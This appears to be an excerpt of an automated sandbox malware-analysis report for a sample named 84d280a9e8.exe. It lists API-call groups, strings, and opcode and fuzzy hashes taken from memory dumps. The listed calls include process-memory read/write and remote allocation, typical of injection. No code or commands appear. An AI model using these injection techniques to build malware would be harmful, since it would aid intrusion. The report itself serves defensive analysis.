                                                                                                                                        • Instruction Fuzzy Hash: 6D916A71A4C209AFCB14EF54D8919BDBBF1EF4A300F1080D9F9469B2A2DB71AE45CB51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B8B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B821D0,?,?,00000034,00000800,?,00000034), ref: 00B8B42D
                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B82760
                                                                                                                                          • Part of subcall function 00B8B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B821FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00B8B3F8
                                                                                                                                          • Part of subcall function 00B8B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00B8B355
                                                                                                                                          • Part of subcall function 00B8B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B82194,00000034,?,?,00001004,00000000,00000000), ref: 00B8B365
                                                                                                                                          • Part of subcall function 00B8B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B82194,00000034,?,?,00001004,00000000,00000000), ref: 00B8B37B
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B827CD
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B8281A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                        • Opcode ID: 770907099746735361cd653805b961d29035344c7509af468b473e010c2daa57
                                                                                                                                        • Instruction ID: e193aa1a98864ba96bc68ba0d3c7ce486580195da04f3606bd2111d1092653ce
                                                                                                                                        • Opcode Fuzzy Hash: 770907099746735361cd653805b961d29035344c7509af468b473e010c2daa57
                                                                                                                                        • Instruction Fuzzy Hash: 8841FA76900218AFDB10EBA4CD46EEEBBB8EF09700F104095FA55B7191DB706E45CBA1
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe,00000104), ref: 00B51769
                                                                                                                                        • _free.LIBCMT ref: 00B51834
                                                                                                                                        • _free.LIBCMT ref: 00B5183E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe
                                                                                                                                        • API String ID: 2506810119-2155251588
                                                                                                                                        • Opcode ID: 302ed7b2d3bf4f5d23cf70f813a5504dd4b297f8832e722911e92c6e4cd0197f
                                                                                                                                        • Instruction ID: ba94808e5cc33934c15ecfd893e2ced4964e753289e2845928eb7863eae76bd5
                                                                                                                                        • Opcode Fuzzy Hash: 302ed7b2d3bf4f5d23cf70f813a5504dd4b297f8832e722911e92c6e4cd0197f
                                                                                                                                        • Instruction Fuzzy Hash: 993143B5A00218EBDB21DB9D9885FAEBBFCEB89311F1445E6F80497211D6704E48CB90
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B8C306
                                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00B8C34C
                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BF1990,01095928), ref: 00B8C395
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 135850232-4108050209
                                                                                                                                        • Opcode ID: 26877e66c602a7b450c648def943a87fcb7d8598eb22edafc935b0dd040d9408
                                                                                                                                        • Instruction ID: bbbc989848c43386a2bd5f7272fd4fc6ff7197a043ba1e0280ecdfeb83867c52
                                                                                                                                        • Opcode Fuzzy Hash: 26877e66c602a7b450c648def943a87fcb7d8598eb22edafc935b0dd040d9408
                                                                                                                                        • Instruction Fuzzy Hash: 3941B1B12043019FD720EF24D885B5ABFE4EF85310F1086ADF8A5972E2D770E905CB6A
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BBCC08,00000000,?,?,?,?), ref: 00BB44AA
                                                                                                                                        • GetWindowLongW.USER32 ref: 00BB44C7
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BB44D7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long
                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                        • Opcode ID: 9cf751a3039b67e4b1b8c3c4ba72defce6d6cfb32edf66208bbcb39ef02ab57a
                                                                                                                                        • Instruction ID: 3c2b6f5a07b8c3b1354fe677810a8ed39f62eef12ce748ef7c25b2c220cdaa14
                                                                                                                                        • Opcode Fuzzy Hash: 9cf751a3039b67e4b1b8c3c4ba72defce6d6cfb32edf66208bbcb39ef02ab57a
                                                                                                                                        • Instruction Fuzzy Hash: 0C317C31210605AFDB208E38DC45BEA7BE9FB08324F204755F979932E1DBB0EC609760
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00BA335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00BA3077,?,?), ref: 00BA3378
                                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BA307A
                                                                                                                                        • _wcslen.LIBCMT ref: 00BA309B
                                                                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00BA3106
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                        • API String ID: 946324512-2422070025
                                                                                                                                        • Opcode ID: ab99d739402e45895c55d3f53bb687a3e745e8cc91896f8b9f4bee7680b7eda9
                                                                                                                                        • Instruction ID: ced7145217aae21674795ad89f9e061418bb4ec0808da6d78d688d8b942a8c4f
                                                                                                                                        • Opcode Fuzzy Hash: ab99d739402e45895c55d3f53bb687a3e745e8cc91896f8b9f4bee7680b7eda9
                                                                                                                                        • Instruction Fuzzy Hash: 9D31D5352082059FCB20CF68C485F6977E0EF16714F2480D9F8159B392DB72DE45C760
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BB3F40
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BB3F54
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BB3F78
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                        • String ID: SysMonthCal32
                                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                                        • Opcode ID: e22395766b40dcd19653e522f2c3d3e49651e410eae8d7739abb96a2a8e81661
                                                                                                                                        • Instruction ID: 97221c9a8f34830c920a1dc333f67d59acc9a7f86301a7c1b04d39ae795d7c9f
                                                                                                                                        • Opcode Fuzzy Hash: e22395766b40dcd19653e522f2c3d3e49651e410eae8d7739abb96a2a8e81661
                                                                                                                                        • Instruction Fuzzy Hash: 80219C32650219BBDF21DF94DC86FFA3BB9EB48B14F110254FA156B1D0DAB1E950CBA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BB4705
                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BB4713
                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BB471A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                        • Opcode ID: 9cf4eaf42e883b5a87f8af0cbba151f56fb0c675bc2b1e00be9f0eb89b32e16c
                                                                                                                                        • Instruction ID: ad51fa075244ff372c183f70ebf97e31a7193074abb584d5bb8281f8f08cf2ba
                                                                                                                                        • Opcode Fuzzy Hash: 9cf4eaf42e883b5a87f8af0cbba151f56fb0c675bc2b1e00be9f0eb89b32e16c
                                                                                                                                        • Instruction Fuzzy Hash: 832160B5600208AFDB10DF69DCC1DB737EDEB5A394B040499FA019B251CBB1EC11CAA0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen
                                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                        • API String ID: 176396367-2734436370
                                                                                                                                        • Opcode ID: 73402e71918bd24a615e88859a85417dfe40c4bddcff3dba841dacbf8da1b4fd
                                                                                                                                        • Instruction ID: ef590337dc2fc6c7a649bf487f54bda6fbd692dabe32a474cba7b3ce1cb5ac6f
                                                                                                                                        • Opcode Fuzzy Hash: 73402e71918bd24a615e88859a85417dfe40c4bddcff3dba841dacbf8da1b4fd
                                                                                                                                        • Instruction Fuzzy Hash: F021383224462166CB31BA24DC42FFB73D8DF61700F1840A6F94997061FB91DE41D395
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BB3840
                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BB3850
                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BB3876
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                        • String ID: Listbox
                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                        • Opcode ID: c3a529e98c5247d4e1229a5b9722bab412d33e06d4c47fc8d6c5d30c814bb658
                                                                                                                                        • Instruction ID: 1617cd98d0da38c1caf5e8e0e7b769b69b498d84ee384bcbcf682408f885418a
                                                                                                                                        • Opcode Fuzzy Hash: c3a529e98c5247d4e1229a5b9722bab412d33e06d4c47fc8d6c5d30c814bb658
                                                                                                                                        • Instruction Fuzzy Hash: 7C218E72610218BBEB218F55DC85EFB3BEEEF89B50F118164F9059B190CAB1DC5287A0
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B94A08
                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B94A5C
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,00BBCC08), ref: 00B94AD0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                                        • String ID: %lu
                                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                                        • Opcode ID: 5f9f549c6f1b506e6fb6c7c2472cffd4eabff3c6a38c438593b35667998bda0a
                                                                                                                                        • Instruction ID: 6023c538794c29598648845a8a1ebfd8222956b48a0c9a7eefbe4b9704865e2e
                                                                                                                                        • Opcode Fuzzy Hash: 5f9f549c6f1b506e6fb6c7c2472cffd4eabff3c6a38c438593b35667998bda0a
                                                                                                                                        • Instruction Fuzzy Hash: 71315375A00119AFDB10DF54C885EAA7BF8EF48308F1440E5F509EB262DB71ED46CB61
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BB424F
                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BB4264
                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BB4271
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                        • Opcode ID: bb2f66ccdac775136dcf2ae674ca48dd60bf3b40129568129c647a2cb2b9e2a8
                                                                                                                                        • Instruction ID: de34caf5b90425ff099d2c7b29fec3aeb8bdbeee99f36649498eaa67eaa5a5a9
                                                                                                                                        • Opcode Fuzzy Hash: bb2f66ccdac775136dcf2ae674ca48dd60bf3b40129568129c647a2cb2b9e2a8
                                                                                                                                        • Instruction Fuzzy Hash: 5911BF31250248BBEB209E29CC46FFB3BECEF95B54F010514FA55A60A1D6B1D8119B50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B26B57: _wcslen.LIBCMT ref: 00B26B6A
                                                                                                                                          • Part of subcall function 00B82DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B82DC5
                                                                                                                                          • Part of subcall function 00B82DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B82DD6
                                                                                                                                          • Part of subcall function 00B82DA7: GetCurrentThreadId.KERNEL32 ref: 00B82DDD
                                                                                                                                          • Part of subcall function 00B82DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B82DE4
                                                                                                                                        • GetFocus.USER32 ref: 00B82F78
                                                                                                                                          • Part of subcall function 00B82DEE: GetParent.USER32(00000000), ref: 00B82DF9
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00B82FC3
                                                                                                                                        • EnumChildWindows.USER32(?,00B8303B), ref: 00B82FEB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                        • String ID: %s%d
                                                                                                                                        • API String ID: 1272988791-1110647743
                                                                                                                                        • Opcode ID: 1fe4f1c9956c7fdef24afc690fdc3a7a31fead4e21dd275e743c6cf56e7b1947
                                                                                                                                        • Instruction ID: 36aa19f9015f9ee46549daa5cd8f8ebddf2665dc4cdcd8266f496ca4711e7992
                                                                                                                                        • Opcode Fuzzy Hash: 1fe4f1c9956c7fdef24afc690fdc3a7a31fead4e21dd275e743c6cf56e7b1947
                                                                                                                                        • Instruction Fuzzy Hash: FD11A2756002056BDF15BF649C86EED3BEAAF94704F0440B5F90A9B262DE709945CB70
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00BB58C1
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00BB58EE
                                                                                                                                        • DrawMenuBar.USER32(?), ref: 00BB58FD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 3227129158-4108050209
                                                                                                                                        • Opcode ID: 3c6728c001434638e05586fc4188a9a55c8f0c5fbd71b7e0a454db956ca4d113
                                                                                                                                        • Instruction ID: 22856af188ed18966548cfef6c34225c3e1420f16c992c116d8e232c4a55d565
                                                                                                                                        • Opcode Fuzzy Hash: 3c6728c001434638e05586fc4188a9a55c8f0c5fbd71b7e0a454db956ca4d113
                                                                                                                                        • Instruction Fuzzy Hash: 3C010931500219EFDB219F11DC85BEABBB4FB45361F1480EAE889D6251DBB09A949F32
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00B7D3BF
                                                                                                                                        • FreeLibrary.KERNEL32 ref: 00B7D3E5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                        • API String ID: 3013587201-2590602151
                                                                                                                                        • Opcode ID: e49477c4284bd618498cbe2064d29bd800a5d9b0466f4892aca5d0760ffb06bd
                                                                                                                                        • Instruction ID: 519ca02abdd1a74b0bdb93ea2177c2696a1167a787c294921f38fcfe817d550a
                                                                                                                                        • Opcode Fuzzy Hash: e49477c4284bd618498cbe2064d29bd800a5d9b0466f4892aca5d0760ffb06bd
                                                                                                                                        • Instruction Fuzzy Hash: 43F05C218047059BC7745614CCC8A6D37F4EF10781FA2C6C9F03DF20D6EBA0CC41865A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
